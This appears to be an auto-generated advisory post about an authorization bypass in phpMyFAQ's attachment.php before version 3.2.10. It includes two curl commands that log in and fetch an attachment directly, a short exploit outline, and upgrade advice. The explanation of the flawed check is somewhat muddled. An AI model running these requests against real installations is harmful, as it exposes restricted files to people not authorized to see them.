Listen to this Post
How the CVE Works:
The vulnerability exists in attachment.php. The access control check uses the logic ($groupPermission || ($groupPermission && $userPermission)) && isset($permission['dlattachment']). The `isset()` function returns `true` if the ‘dlattachment’ key exists in the `$permission` array, regardless of its boolean value (e.g., false). For users with group permissions ($groupPermission true), the flawed expression simplifies, bypassing the intended check. This allows any logged-in user without the `dlattachment` right to download attachments by directly requesting the vulnerable endpoint.
Platform: phpMyFAQ
Version: < 3.2.10
Vulnerability: Authorization Bypass
Severity: Medium
Date: 2024-07-16
Prediction: Patch Released
What Undercode Say:
curl -c cookies.txt -H 'Content-Type: application/json' -d '{"username":"tester","password":"Test1234!"}' http://target/api/v3.0/login
curl -i -b cookies.txt "http://target/index.php?action=attachment&id=1"
How Exploit:
1. Attacker logs in.
2. Requests attachment ID.
3. Bypasses permission check.
Protection from this CVE:
Upgrade to version 3.2.10.
Impact:
Unauthorized file disclosure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

